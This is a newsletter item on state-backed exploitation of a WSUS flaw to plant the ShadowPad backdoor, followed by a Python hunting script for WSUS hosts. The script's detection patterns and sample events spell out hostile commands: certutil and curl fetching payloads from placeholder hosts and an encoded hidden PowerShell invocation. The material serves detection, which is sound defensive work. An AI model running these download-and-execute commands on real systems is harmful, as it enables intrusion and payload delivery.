Nation-State | Patch Infrastructure Compromise

CybersecurityHQ | Daily Cyber Insight

Welcome reader, here’s today’s Daily Cyber Insight.

Brought to you by:

👣 Smallstep – Secures Wi-Fi, VPNs, ZTNA, SaaS and APIs with hardware-bound credentials powered by ACME Device Attestation

📊 LockThreat – AI-powered GRC that replaces legacy tools and unifies compliance, risk, audit and vendor management in one platform


Executive Snapshot
Your patch management system just became the attack surface. Chinese state-sponsored actors weaponized a WSUS deserialization flaw within hours of the PoC release, gaining SYSTEM-level access to the infrastructure designed to keep your environment secure.

Signal
CISA elevated CVE-2025-59287 to emergency status after observing attackers exploit unauthenticated WSUS endpoints to deploy the ShadowPad backdoor via native Windows utilities, which lets the activity evade endpoint detection.

Strategic Implication
You trusted WSUS to distribute patches. Adversaries trusted it to distribute persistence.

Action
Verify today that every WSUS server is patched against CVE-2025-59287 and audit all servers for ShadowPad indicators. Block inbound traffic to TCP ports 8530 and 8531 (the WSUS HTTP and HTTPS ports) from non-Microsoft Update sources now. Hunt this week for anomalous PowerShell, certutil, and curl execution patterns on WSUS hosts.
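One way to run the hunt in the last action item, as an added example that is not the newsletter's own code: it scores Windows process-creation records (Sysmon Event ID 1 or Security 4688 style) for certutil, curl and PowerShell invocations that carry download or obfuscation arguments, scoped to WSUS hosts, and raises the severity when the parent is a WSUS process. The host inventory, the assumed WSUS parent process names (w3wp.exe and WsusService.exe) and the sample events are constructed; the example goes slightly beyond the text by also flagging any process spawned by a WSUS parent, whatever its name.

```python
"""Hunt for certutil/curl/PowerShell download-and-execute patterns on WSUS hosts.

Added example, not from the newsletter. Assumptions: records are dicts in a
Sysmon Event ID 1 / Security 4688 style (host, parent image, image, command
line); the WSUS host list and WSUS parent process names are constructed.
"""
import re
from dataclasses import dataclass

# Hosts that run the WSUS role (constructed inventory; replace with CMDB data).
WSUS_HOSTS = {"wsus01.corp.example", "wsus02.corp.example"}

# Assumption: WSUS runs inside IIS (w3wp.exe) and the WsusService.exe service;
# a shell or LOLBin spawned by either is rarely legitimate.
WSUS_PARENTS = {"w3wp.exe", "wsusservice.exe"}

# Per-binary argument patterns associated with remote download or obfuscated execution.
_PS_PATTERN = re.compile(
    r"-e(nc|ncodedcommand)?\b|downloadstring|downloadfile|invoke-webrequest"
    r"|\biex\b|invoke-expression|-w(indowstyle)?\s+hidden",
    re.I,
)
PATTERNS = {
    "certutil.exe": re.compile(r"-urlcache|-decode|-encode", re.I),
    "curl.exe": re.compile(r"https?://|\s-o\b|--output", re.I),
    "powershell.exe": _PS_PATTERN,
    "pwsh.exe": _PS_PATTERN,
}


@dataclass(frozen=True)
class Finding:
    host: str
    image: str
    reason: str
    severity: str


def basename(path: str) -> str:
    """Lower-cased file name from a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def hunt(events, wsus_hosts=WSUS_HOSTS):
    """Return Findings for suspicious process creations on WSUS hosts."""
    scope = {h.lower() for h in wsus_hosts}
    findings = []
    for ev in events:
        if ev["host"].lower() not in scope:
            continue  # action item scopes the hunt to WSUS hosts
        image = basename(ev["image"])
        parent = basename(ev["parent"])
        spawned_by_wsus = parent in WSUS_PARENTS
        pattern = PATTERNS.get(image)
        if pattern is None and not spawned_by_wsus:
            continue  # not a watched binary and not a WSUS child
        match = pattern.search(ev["cmdline"]) if pattern else None
        if match:
            severity = "high" if spawned_by_wsus else "medium"
            reason = f"{image} with '{match.group(0)}'"
            if spawned_by_wsus:
                reason += f" spawned by WSUS process {parent}"
        elif spawned_by_wsus:
            severity, reason = "medium", f"{image} spawned by WSUS process {parent}"
        else:
            continue  # watched binary, but no download/obfuscation arguments
        findings.append(Finding(ev["host"], image, reason, severity))
    return findings


# Constructed sample telemetry (TEST-NET addresses), not real events.
SAMPLE_EVENTS = [
    {"host": "wsus01.corp.example", "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://203.0.113.5/update.bin C:\Windows\Temp\update.bin"},
    {"host": "wsus01.corp.example", "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"},
    {"host": "wsus02.corp.example", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -o C:\Users\admin\Downloads\tool.zip https://203.0.113.9/tool.zip"},
    {"host": "wsus02.corp.example", "parent": r"C:\Program Files\Update Services\Service\WsusService.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami"},
    # Benign admin maintenance script: watched binary, no suspicious arguments.
    {"host": "wsus01.corp.example", "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\WsusCleanup.ps1"},
    # Same certutil pattern on a non-WSUS host: out of scope for this hunt.
    {"host": "fileserver01.corp.example", "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.5/x.bin x.bin"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.severity.upper()}] {f.host}: {f.reason}")
```

Feed it the exported process-creation events from your SIEM and review anything rated high first; the medium tier catches download tooling run interactively by administrators, which still deserves a look on a WSUS host.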
